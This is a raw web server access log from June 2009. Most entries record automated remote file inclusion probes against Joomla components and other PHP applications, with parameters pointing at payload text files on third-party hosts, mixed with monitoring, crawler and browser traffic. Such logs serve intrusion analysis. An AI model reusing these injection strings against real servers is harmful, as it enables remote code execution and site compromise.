76.164.212.18 - - [12/Jun/2009:00:39:54 -0400] "GET /logs/access_log.Q109052100%20%20/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
187.25.80.250 - - [12/Jun/2009:00:40:01 -0400] "GET /logs/error_log.Q109052800//include/bbs.lib.inc.php?site_path=http://typh0n.awardspace.co.uk/id.txt???? HTTP/1.1" 404 248 "-" "libwww-perl/5.820"
209.59.12.99 - - [12/Jun/2009:00:40:07 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
118.129.166.203 - - [12/Jun/2009:00:40:34 -0400] "GET //bookmark4u/lostpasswd.php?env[include_prefix]=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
91.121.23.156 - - [12/Jun/2009:00:40:37 -0400] "GET /logs/access_log.Q109060500/components/com_virtuemart/export.php?mosConfig_absolute_path=http://200.58.113.248/trac-juegos.com.ar/cms///administrator/components/com_virtuemart/id.txt??? HTTP/1.1" 404 261 "-" "libwww-perl/5.813"
91.121.23.156 - - [12/Jun/2009:00:40:37 -0400] "GET /components/com_virtuemart/export.php?mosConfig_absolute_path=http://200.58.113.248/trac-juegos.com.ar/cms///administrator/components/com_virtuemart/id.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.813"
91.121.23.156 - - [12/Jun/2009:00:40:37 -0400] "GET /logs/components/com_virtuemart/export.php?mosConfig_absolute_path=http://200.58.113.248/trac-juegos.com.ar/cms///administrator/components/com_virtuemart/id.txt??? HTTP/1.1" 404 239 "-" "libwww-perl/5.813"
118.129.166.203 - - [12/Jun/2009:00:40:38 -0400] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
118.129.166.203 - - [12/Jun/2009:00:40:38 -0400] "GET /logs/access_log.Q109060500//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
84.201.208.50 - - [12/Jun/2009:00:41:12 -0400] "GET /logs/access_log.Q109060500//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
213.189.2.38 - - [12/Jun/2009:00:41:40 -0400] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://bandenpaleis.nl/bp/modules/id1.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
213.189.2.38 - - [12/Jun/2009:00:41:40 -0400] "GET /logs/access_log.Q109051600//doceboCms/class/class.dashboard_cms.php?where_framework=http://bandenpaleis.nl/bp/modules/id1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
213.189.2.38 - - [12/Jun/2009:00:41:40 -0400] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://bandenpaleis.nl/bp/modules/id1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
91.121.23.156 - - [12/Jun/2009:00:41:54 -0400] "GET /logs/access_log.Q109060500/components/com_virtuemart/export.php?mosConfig_absolute_path=http://200.58.113.248/trac-juegos.com.ar/cms///administrator/components/com_virtuemart/id.txt??? HTTP/1.1" 404 261 "-" "libwww-perl/5.813"
91.121.23.156 - - [12/Jun/2009:00:41:54 -0400] "GET /components/com_virtuemart/export.php?mosConfig_absolute_path=http://200.58.113.248/trac-juegos.com.ar/cms///administrator/components/com_virtuemart/id.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.813"
91.121.23.156 - - [12/Jun/2009:00:41:54 -0400] "GET /logs/components/com_virtuemart/export.php?mosConfig_absolute_path=http://200.58.113.248/trac-juegos.com.ar/cms///administrator/components/com_virtuemart/id.txt??? HTTP/1.1" 404 239 "-" "libwww-perl/5.813"
213.189.2.38 - - [12/Jun/2009:00:41:58 -0400] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://bandenpaleis.nl/bp/modules/id1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
213.189.2.38 - - [12/Jun/2009:00:41:59 -0400] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://bandenpaleis.nl/bp/modules/id1.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
213.189.2.38 - - [12/Jun/2009:00:41:59 -0400] "GET /logs/access_log.Q109051600//doceboCms/class/class.dashboard_cms.php?where_framework=http://bandenpaleis.nl/bp/modules/id1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
64.70.103.140 - - [12/Jun/2009:00:42:07 -0400] "GET //?_SERVER[DOCUMENT_ROOT]=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
64.70.103.140 - - [12/Jun/2009:00:42:07 -0400] "GET /logs/error_log.Q108111500%20%20//?_SERVER[DOCUMENT_ROOT]=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
64.70.103.140 - - [12/Jun/2009:00:42:07 -0400] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 200 5175 "-" "Mozilla/5.0"
118.129.166.203 - - [12/Jun/2009:00:42:10 -0400] "GET /logs/access_log.Q109052900//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
66.249.71.54 - - [12/Jun/2009:00:42:11 -0400] "GET /images/logo_5.gif HTTP/1.1" 200 783 "-" "Googlebot-Image/1.0"
64.70.103.245 - - [12/Jun/2009:00:42:13 -0400] "GET //?_SERVER[DOCUMENT_ROOT]=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
64.70.103.245 - - [12/Jun/2009:00:42:13 -0400] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 200 5175 "-" "Mozilla/5.0"
64.70.103.245 - - [12/Jun/2009:00:42:13 -0400] "GET /logs/error_log.Q108111500%20%20//?_SERVER[DOCUMENT_ROOT]=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
64.70.103.140 - - [12/Jun/2009:00:42:14 -0400] "GET /logs/error_log.Q109030300%20%20//?_SERVER[DOCUMENT_ROOT]=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
78.46.68.17 - - [12/Jun/2009:00:42:40 -0400] "GET /logs/access_log.Q109060500//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
64.70.103.245 - - [12/Jun/2009:00:42:40 -0400] "GET /logs/error_log.Q109030300%20%20//?_SERVER[DOCUMENT_ROOT]=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
213.189.2.38 - - [12/Jun/2009:00:42:41 -0400] "GET /logs/access_log.Q109052200//doceboCms/class/class.dashboard_cms.php?where_framework=http://bandenpaleis.nl/bp/modules/id1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
84.201.208.50 - - [12/Jun/2009:00:42:57 -0400] "GET /logs/access_log.Q109052900//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
64.70.103.151 - - [12/Jun/2009:00:43:06 -0400] "GET //?_SERVER[DOCUMENT_ROOT]=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
64.70.103.151 - - [12/Jun/2009:00:43:06 -0400] "GET /logs/error_log.Q108111500%20%20//?_SERVER[DOCUMENT_ROOT]=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
64.70.103.151 - - [12/Jun/2009:00:43:06 -0400] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 200 5175 "-" "Mozilla/5.0"
213.189.2.38 - - [12/Jun/2009:00:43:11 -0400] "GET /logs/access_log.Q109052200//doceboCms/class/class.dashboard_cms.php?where_framework=http://bandenpaleis.nl/bp/modules/id1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
91.121.23.156 - - [12/Jun/2009:00:43:23 -0400] "GET /logs/access_log.Q109051100/components/com_virtuemart/export.php?mosConfig_absolute_path=http://200.58.113.248/trac-juegos.com.ar/cms///administrator/components/com_virtuemart/id.txt??? HTTP/1.1" 404 261 "-" "libwww-perl/5.813"
64.70.103.151 - - [12/Jun/2009:00:43:25 -0400] "GET /logs/error_log.Q109030300%20%20//?_SERVER[DOCUMENT_ROOT]=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
91.121.23.156 - - [12/Jun/2009:00:43:28 -0400] "GET /logs/error_log.Q108061100/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://200.58.113.248/trac-juegos.com.ar/cms///administrator/components/com_virtuemart/id.txt??? HTTP/1.1" 404 258 "-" "libwww-perl/5.813"
91.121.23.156 - - [12/Jun/2009:00:43:29 -0400] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://200.58.113.248/trac-juegos.com.ar/cms///administrator/components/com_virtuemart/id.txt??? HTTP/1.1" 404 232 "-" "libwww-perl/5.813"
91.121.23.156 - - [12/Jun/2009:00:43:29 -0400] "GET /logs/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://200.58.113.248/trac-juegos.com.ar/cms///administrator/components/com_virtuemart/id.txt??? HTTP/1.1" 404 237 "-" "libwww-perl/5.813"
78.46.68.17 - - [12/Jun/2009:00:43:33 -0400] "GET /logs/access_log.Q109052900//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
76.164.212.18 - - [12/Jun/2009:00:43:43 -0400] "GET /logs/access_log.Q109052100/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
91.121.23.156 - - [12/Jun/2009:00:43:48 -0400] "GET /logs/access_log.Q109052900/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://200.58.113.248/trac-juegos.com.ar/cms///administrator/components/com_virtuemart/id.txt??? HTTP/1.1" 404 259 "-" "libwww-perl/5.813"
91.121.23.156 - - [12/Jun/2009:00:44:01 -0400] "GET /logs/error_log.Q108100200/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://200.58.113.248/trac-juegos.com.ar/cms///administrator/components/com_virtuemart/id.txt??? HTTP/1.1" 404 262 "-" "libwww-perl/5.813"
91.121.23.156 - - [12/Jun/2009:00:44:01 -0400] "GET /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://200.58.113.248/trac-juegos.com.ar/cms///administrator/components/com_virtuemart/id.txt??? HTTP/1.1" 404 236 "-" "libwww-perl/5.813"
91.121.23.156 - - [12/Jun/2009:00:44:01 -0400] "GET /logs/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://200.58.113.248/trac-juegos.com.ar/cms///administrator/components/com_virtuemart/id.txt??? HTTP/1.1" 404 241 "-" "libwww-perl/5.813"
91.121.23.156 - - [12/Jun/2009:00:44:26 -0400] "GET /logs/access_log.Q109051100/components/com_virtuemart/export.php?mosConfig_absolute_path=http://200.58.113.248/trac-juegos.com.ar/cms///administrator/components/com_virtuemart/id.txt??? HTTP/1.1" 404 261 "-" "libwww-perl/5.813"
87.106.135.14 - - [12/Jun/2009:00:44:45 -0400] "GET /logs/access_log.Q109060500//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
64.70.103.140 - - [12/Jun/2009:00:44:51 -0400] "GET /logs/error_log.Q108111500//?_SERVER[DOCUMENT_ROOT]=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
64.70.103.140 - - [12/Jun/2009:00:44:51 -0400] "GET /logs/error_log.Q109030300//?_SERVER[DOCUMENT_ROOT]=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
91.121.23.156 - - [12/Jun/2009:00:44:57 -0400] "GET /logs/access_log.Q109060800/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://200.58.113.248/trac-juegos.com.ar/cms///administrator/components/com_virtuemart/id.txt??? HTTP/1.1" 404 263 "-" "libwww-perl/5.813"
66.249.71.14 - - [12/Jun/2009:00:45:05 -0400] "GET /cgi-bin/LANSAWEB?PROCFUN+WORDPR01+FULLIMG+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L1071E43121F8F6005B0901M+WSEQ(S0060):1+OUITEM(A0200):4544700 HTTP/1.1" 200 27010 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
87.106.135.14 - - [12/Jun/2009:00:45:06 -0400] "GET /logs/access_log.Q109052900//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Jun/2009:00:45:07 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
217.147.30.80 - - [12/Jun/2009:00:46:20 -0400] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://cafe0.fileave.com/id.feelcomz.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jun/2009:00:46:20 -0400] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://cafe0.fileave.com/id.feelcomz.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jun/2009:00:46:20 -0400] "GET /logs/access_log.Q109052800%20%20//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://cafe0.fileave.com/id.feelcomz.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jun/2009:00:46:48 -0400] "GET /logs/access_log.Q109052600%20%20//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://cafe0.fileave.com/id.feelcomz.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
121.165.73.157 - - [12/Jun/2009:00:47:31 -0400] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://cafe0.fileave.com/id.feelcomz.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
121.165.73.157 - - [12/Jun/2009:00:47:31 -0400] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://cafe0.fileave.com/id.feelcomz.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
121.165.73.157 - - [12/Jun/2009:00:47:31 -0400] "GET /logs/access_log.Q109052800//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://cafe0.fileave.com/id.feelcomz.txt??? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
121.165.73.157 - - [12/Jun/2009:00:47:55 -0400] "GET /logs/access_log.Q109052600//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://cafe0.fileave.com/id.feelcomz.txt??? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
121.165.73.157 - - [12/Jun/2009:00:48:34 -0400] "GET /logs/access_log.Q109052800%20%20//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://cafe0.fileave.com/id.feelcomz.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
121.165.73.157 - - [12/Jun/2009:00:48:42 -0400] "GET /logs/access_log.Q109052600%20%20//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://cafe0.fileave.com/id.feelcomz.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jun/2009:00:48:46 -0400] "GET /logs/access_log.Q109052800//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://cafe0.fileave.com/id.feelcomz.txt??? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jun/2009:00:48:55 -0400] "GET /logs/access_log.Q109052600//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://cafe0.fileave.com/id.feelcomz.txt??? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
64.70.103.245 - - [12/Jun/2009:00:48:58 -0400] "GET /logs/error_log.Q108111500//?_SERVER[DOCUMENT_ROOT]=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
64.70.103.245 - - [12/Jun/2009:00:49:14 -0400] "GET /logs/error_log.Q109030300//?_SERVER[DOCUMENT_ROOT]=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
64.70.103.151 - - [12/Jun/2009:00:49:31 -0400] "GET /logs/error_log.Q108111500//?_SERVER[DOCUMENT_ROOT]=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
76.164.212.18 - - [12/Jun/2009:00:49:53 -0400] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
76.164.212.18 - - [12/Jun/2009:00:49:53 -0400] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
76.164.212.18 - - [12/Jun/2009:00:49:53 -0400] "GET /logs/access_log.Q109060800/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
76.114.150.150 - - [12/Jun/2009:00:50:01 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
76.114.150.150 - - [12/Jun/2009:00:50:01 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
76.114.150.150 - - [12/Jun/2009:00:50:01 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
76.114.150.150 - - [12/Jun/2009:00:50:01 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
209.59.12.99 - - [12/Jun/2009:00:50:08 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
64.70.103.151 - - [12/Jun/2009:00:50:39 -0400] "GET /logs/error_log.Q109030300//?_SERVER[DOCUMENT_ROOT]=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
64.70.103.140 - - [12/Jun/2009:00:50:58 -0400] "GET //?_SERVER[DOCUMENT_ROOT]=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
64.70.103.140 - - [12/Jun/2009:00:50:58 -0400] "GET /logs/access_log.Q109050300%20%20//?_SERVER[DOCUMENT_ROOT]=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
64.70.103.140 - - [12/Jun/2009:00:50:58 -0400] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 200 5175 "-" "Mozilla/5.0"
64.70.103.151 - - [12/Jun/2009:00:51:20 -0400] "GET //?_SERVER[DOCUMENT_ROOT]=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
64.70.103.151 - - [12/Jun/2009:00:51:20 -0400] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 200 5175 "-" "Mozilla/5.0"
64.70.103.151 - - [12/Jun/2009:00:51:20 -0400] "GET /logs/access_log.Q109050300%20%20//?_SERVER[DOCUMENT_ROOT]=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
64.70.103.245 - - [12/Jun/2009:00:51:25 -0400] "GET //?_SERVER[DOCUMENT_ROOT]=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
64.70.103.245 - - [12/Jun/2009:00:51:25 -0400] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 200 5175 "-" "Mozilla/5.0"
64.70.103.245 - - [12/Jun/2009:00:51:25 -0400] "GET /logs/access_log.Q109050300%20%20//?_SERVER[DOCUMENT_ROOT]=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jun/2009:00:51:29 -0400] "GET /logs/access_log.Q109051600//class/class.dashboard_cms.php?where_framework=http://www.lidoestensi.com/dmdocuments/root/glup.txt? HTTP/1.1" 404 255 "-" "libwww-perl/5.79"
217.147.30.80 - - [12/Jun/2009:00:51:32 -0400] "GET //class/class.dashboard_cms.php?where_framework=http://www.lidoestensi.com/dmdocuments/root/glup.txt? HTTP/1.1" 404 228 "-" "libwww-perl/5.79"
217.147.30.80 - - [12/Jun/2009:00:51:33 -0400] "GET /logs//class/class.dashboard_cms.php?where_framework=http://www.lidoestensi.com/dmdocuments/root/glup.txt? HTTP/1.1" 404 233 "-" "libwww-perl/5.79"
213.189.2.38 - - [12/Jun/2009:00:51:43 -0400] "GET /logs/access_log.Q109053000//doceboCms/class/class.dashboard_cms.php?where_framework=http://bandenpaleis.nl/bp/modules/id1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
213.189.2.38 - - [12/Jun/2009:00:52:35 -0400] "GET /logs/access_log.Q109053000//doceboCms/class/class.dashboard_cms.php?where_framework=http://bandenpaleis.nl/bp/modules/id1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
81.248.63.177 - - [12/Jun/2009:00:52:37 -0400] "GET /joomla/index.php?option=com_restaurante&task=http://ukcouncilexchanges.info/FX29ID1.txt??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
81.248.63.177 - - [12/Jun/2009:00:52:38 -0400] "GET /logs/joomla/index.php?option=com_restaurante&task=http://ukcouncilexchanges.info/FX29ID1.txt??? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
81.248.63.177 - - [12/Jun/2009:00:52:38 -0400] "GET /logs/access_log.Q109053100/joomla/index.php?option=com_restaurante&task=http://ukcouncilexchanges.info/FX29ID1.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
64.70.103.140 - - [12/Jun/2009:00:52:40 -0400] "GET /logs/access_log.Q109052400%20%20//?_SERVER[DOCUMENT_ROOT]=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
121.165.73.157 - - [12/Jun/2009:00:52:47 -0400] "GET /logs/errors.php?error=http://cafe0.fileave.com/id.feelcomz.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
121.165.73.157 - - [12/Jun/2009:00:52:47 -0400] "GET /logs/access_log.Q109060800%20%20/errors.php?error=http://cafe0.fileave.com/id.feelcomz.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
121.165.73.157 - - [12/Jun/2009:00:52:50 -0400] "GET /errors.php?error=http://cafe0.fileave.com/id.feelcomz.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jun/2009:00:52:51 -0400] "GET /errors.php?error=http://cafe0.fileave.com/id.feelcomz.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jun/2009:00:52:51 -0400] "GET /logs/errors.php?error=http://cafe0.fileave.com/id.feelcomz.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jun/2009:00:52:51 -0400] "GET /logs/access_log.Q109060800%20%20/errors.php?error=http://cafe0.fileave.com/id.feelcomz.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
64.70.103.151 - - [12/Jun/2009:00:52:52 -0400] "GET /logs/access_log.Q109052400%20%20//?_SERVER[DOCUMENT_ROOT]=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
64.70.103.245 - - [12/Jun/2009:00:52:53 -0400] "GET /logs/access_log.Q109052400%20%20//?_SERVER[DOCUMENT_ROOT]=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
70.85.165.10 - - [12/Jun/2009:00:53:22 -0400] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://208.98.22.241/id.txt??? HTTP/1.1" 404 247 "-" "libwww-perl/5.811"
70.85.165.10 - - [12/Jun/2009:00:53:22 -0400] "GET /logs/access_log.Q109052400/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://208.98.22.241/id.txt??? HTTP/1.1" 404 269 "-" "libwww-perl/5.811"
70.85.165.10 - - [12/Jun/2009:00:53:22 -0400] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://208.98.22.241/id.txt??? HTTP/1.1" 404 242 "-" "libwww-perl/5.811"
70.85.165.10 - - [12/Jun/2009:00:53:25 -0400] "GET /logs/access_log.Q109052400/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://208.98.22.241/id.txt??? HTTP/1.1" 404 269 "-" "libwww-perl/5.811"
70.85.165.10 - - [12/Jun/2009:00:53:25 -0400] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://208.98.22.241/id.txt??? HTTP/1.1" 404 247 "-" "libwww-perl/5.811"
70.85.165.10 - - [12/Jun/2009:00:53:27 -0400] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://208.98.22.241/id.txt??? HTTP/1.1" 404 242 "-" "libwww-perl/5.811"
110.45.144.89 - - [12/Jun/2009:00:54:23 -0400] "GET /logs/error_log.Q109051100//include/write.php?dir=http://www.yorkza.com/fs1/io/it2.jpg??? HTTP/1.1" 404 242 "-" "libwww-perl/5.79"
70.85.165.10 - - [12/Jun/2009:00:54:37 -0400] "GET /logs/error_log.Q109052400/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://208.98.22.241/id.txt??? HTTP/1.1" 404 268 "-" "libwww-perl/5.811"
70.85.165.10 - - [12/Jun/2009:00:54:39 -0400] "GET /logs/error_log.Q109052400/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://208.98.22.241/id.txt??? HTTP/1.1" 404 268 "-" "libwww-perl/5.811"
209.59.12.99 - - [12/Jun/2009:00:55:10 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
209.62.42.51 - - [12/Jun/2009:00:55:21 -0400] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://fjvdig.iespana.es/fx29id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
209.62.42.51 - - [12/Jun/2009:00:55:21 -0400] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://fjvdig.iespana.es/fx29id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
209.62.42.51 - - [12/Jun/2009:00:55:21 -0400] "GET /logs/access_log.Q109051800//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://fjvdig.iespana.es/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.62.42.51 - - [12/Jun/2009:00:55:23 -0400] "GET /logs/access_log.Q109052700//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://fjvdig.iespana.es/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
